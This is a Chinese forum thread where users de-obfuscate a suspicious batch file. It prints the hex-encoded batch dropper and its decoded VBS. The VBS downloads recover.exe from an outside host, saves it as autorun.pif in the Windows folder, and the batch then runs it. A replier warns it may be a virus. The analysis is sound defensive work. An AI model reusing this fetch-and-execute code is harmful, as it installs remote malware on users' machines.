[特效代码] [已解决]求这段代码是如何加密的？然后怎么解密？

kay1101

@echo off
echoS=^"75726C203D2022687474703A2F2F757365722E66726565322E37373136392E6E65742F746174702F6B6972612F7265636F7665722E65786522200D0A736176656173203D2022633A5C77696E646F77735C6175746F72756E2E70696622200D0A53657420786D6C68747470203D204372656174654F626A65637428224D6963726F736F66742E584D4C485454502229200D0A5365742073747265616D203D204372656174654F626A656374282241444F44422E53747265616D2229200D0A43616C6C20786D6C687474702E6F70656E2822474554222C75726C2C46616C736529200D0A43616C6C20786D6C687474702E73656E642829200D0A73747265616D2E6D6F6465203D2033200D0A73747265616D2E74797065203D2031200D0A43616C6C2073747265616D2E6F70656E2829200D0A43616C6C2073747265616D2E777269746528786D6C687474702E726573706F6E7365626F647929200D0A43616C6C2073747265616D2E73617665746F66696C65287361766561732C322920":D="EXECUTE """"":C="^&CHR(^&H":N=")^":DO WHILE LEN(S)^>1:IF ISNUMERIC(LEFT(S,1))THEN D=D^&C^&LEFT(S,2)^&N:S=MID(S,3) ELSE D=D^&C^&LEFT(S,4)^&N:S=MID(S,5)>tmp
echo LOOP:EXECUTE D>>tmp
%e%r%e%e%e%n %e%t%e%m%e%p %e%d%e%.%e%v%e%b%e%s
s%e%t%e%a%e%r%e%t d%e%.%e%v%e%b%e%s%e%
echo 正在加载，请稍候....
ping 127.0 -n 5 >nul
st%e%a%e%r%e%t %windir%\%e%au%e%to%e%ru%e%n%e%.%e%pi%e%f
echo exit|%ComSpec% /k prompt e 100 B0 13 CD 10 C4 2F AA 11 F8 64 13 06 6C 04 EB F6 $_g$_q$_|debug>nul
复制代码

BAT-VBS

一步一步来吧，因为%e%这个变量没有定义，所以可以全部删除：

@echo off
echoS=^"75726C203D2022687474703A2F2F757365722E66726565322E37373136392E6E65742F746174702F6B6972612F7265636F7665722E65786522200D0A736176656173203D2022633A5C77696E646F77735C6175746F72756E2E70696622200D0A53657420786D6C68747470203D204372656174654F626A65637428224D6963726F736F66742E584D4C485454502229200D0A5365742073747265616D203D204372656174654F626A656374282241444F44422E53747265616D2229200D0A43616C6C20786D6C687474702E6F70656E2822474554222C75726C2C46616C736529200D0A43616C6C20786D6C687474702E73656E642829200D0A73747265616D2E6D6F6465203D2033200D0A73747265616D2E74797065203D2031200D0A43616C6C2073747265616D2E6F70656E2829200D0A43616C6C2073747265616D2E777269746528786D6C687474702E726573706F6E7365626F647929200D0A43616C6C2073747265616D2E73617665746F66696C65287361766561732C322920":D="EXECUTE """"":C="^&CHR(^&H":N=")^":DO WHILE LEN(S)^>1:IF ISNUMERIC(LEFT(S,1))THEN D=D^&C^&LEFT(S,2)^&N:S=MID(S,3) ELSE D=D^&C^&LEFT(S,4)^&N:S=MID(S,5)>tmp
echo LOOP:EXECUTE D>>tmp
ren tmp d.vbs
start d.vbs
echo 正在加载，请稍候....
ping 127.0 -n 5 >nul
start %windir%\autorun.pif
echo exit|%ComSpec% /k prompt e 100 B0 13 CD 10 C4 2F AA 11 F8 64 13 06 6C 04 EB F6 $_g$_q$_|debug>nul
复制代码

这样能看懂了吗？

kay1101

回复 2# BAT-VBS


02和09行的代码怎么解释呢？02行的应该是加密过的vbs吧，09行看不懂，也是加密的？

BAT-VBS

回复 3# kay1101


动态生成的那个VBS解密出来是这样的：

url = "http://user.free2.77169.net/tatp/kira/recover.exe"
saveas = "c:\windows\autorun.pif"
Set xmlhttp = CreateObject("Microsoft.XMLHTTP")
Set stream = CreateObject("ADODB.Stream")
Call xmlhttp.open("GET",url,False)
Call xmlhttp.send()
stream.mode = 3
stream.type = 1
Call stream.open()
Call stream.write(xmlhttp.responsebody)
Call stream.savetofile(saveas,2)
复制代码

不知道是不是病毒，别轻易执行。

BAT-VBS

第九行不是加密，那是debug命令的基本用法之一。

kay1101

回复 4# BAT-VBS


哇，真厉害啊，我好像知道了，就是替换EXECUTE一点点解吧，多谢了~

wc726842270

呵呵，域名都有了，反推就很简单了，只要没有被收回就能找到，不过最差的也得看明白源文件，不过在这之前最好作一些准备，比如，禁用ACTIVEX，JS等

BAT-VBS

回复 7# wc726842270


    你想反推什么东西啊？

BAT-VBS

回复 6# kay1101


论坛有人写过现成的代码
http://www.bathome.net/thread-3637-1-1.html